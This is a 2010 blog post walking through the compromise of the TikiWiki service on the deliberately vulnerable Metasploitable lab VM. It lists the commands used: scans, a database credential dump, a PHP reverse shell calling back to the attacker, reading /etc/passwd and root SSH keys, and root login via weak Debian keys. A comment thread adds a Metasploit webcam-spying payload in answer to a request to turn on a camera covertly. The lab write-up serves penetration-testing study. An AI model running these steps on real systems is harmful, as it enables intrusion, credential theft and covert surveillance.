2010-07-01

[Video] Metasploitable - TikiWiki

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826160
Download video: http://www.mediafire.com/?pr702t9cp4mlkct
Download (debian_ssh_rsa_2048_x86.tar.bz2):  http://www.mediafire.com/?i2mnwymzt51



What is this?
This video demonstrates an attack on the TikiWiki service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com


Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to discover the database details (gaining access)
> [*] Can also use an exploit (gaining access)
> Search the database from the account information (gathering information and gaining access)
> [*] Use a web based backdoor to create shell access (remote access)
> Automate shell access via Metasploit (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> DirBuster v0.12 --- on Backtrack 4 (Final)
> SSH --- on Backtrack 4 (Final)
> NetCat --- on Backtrack 4 (Final)
> php-reverse-shell v1.0 --- http://pentestmonkey.net/tools/php-reverse-shell/
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)


  

 Commands:


nmap 192.168.1.1/24
firefox 192.168.1.105
cd /pentest/web/dirbuster
java -jar DirBuster-0.12.jar -u http://192.168.1.105
firefox 192.168.1.105/tikiwiki
msfconsole
search tikiwiki
use use admin/tikiwiki/tikidblib
setg RHOST 192.168.1.105
exploit
firefox -> www.exploit-db.com -> TikiWiki (2701).
firefox 192.168.1.105/tikiwiki/ -> 192.168.1.105/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
mysql -h 192.168.1.105 -u root -p
show databases;
use tikiwiki195;
show tables;
select * from users_users;
select login, password from users_users;
admin
admin
[new passowrd]
php reverse shell
php-reverse-shell.php -> shell.php
kate -> shell.php -> Replace: 127.0.0.1 with 192.168.1.103 [Our IP]. Replace: 1234 with 4321.
http://192.168.1.103/tikiwiki/backups/shell.php
nc -v -l -p 4321
whoami
hostname
cat /etc/passwd
search tikiwiki
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
show payloads
setg payload generic/shell_bind_tcp
show options
exploit
ls
whoami
cat /etc/passwd
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname



Notes:

Song: Orbital - Halcyon and On and On

Video length: 8:11

Capture length: 21:34



Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tikiwiki.html

Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30077-%5Bvideo%5D-metasploitable-tikiwiki.html#post167041







~g0tmi1k








Posted by
g0tmi1k


at
13:59






















Labels:
,
,















4
comments:
      









  1. Wow, you sure do know what you are doing. Do you know of any more exploits that are used rather commonly? How about turning on a remote camera without the user knowing.
    ReplyDelete
  2. @Krptodr 
    Thanks. (=
    I know of a few - I want to work on some more though. ;) Just got a few scripts, videos and other ideas to work on first =(

    Now about cameras, I've tired this one before.
    In metasploit: set PAYLOAD osx/x86/isight/bind_tcp

    There is also this (I haven't tired it myself):
    http://securitytube.net/Rooting-a-PC-and-Monitoring-its-Webcam-Remotely-video.aspx


    ...and Im also playing on this a tut myself on the "issue" too ;)
    ReplyDelete
  3. Thank you, for the information you have provided. I appreciate your responses. I can't wait for some more scripts. :)
    ReplyDelete
  4. @Krptodr
    Thanks for the thanks!
    They are on their way ;)
    ReplyDelete




























        

      










Subscribe to:
Post Comments (Atom)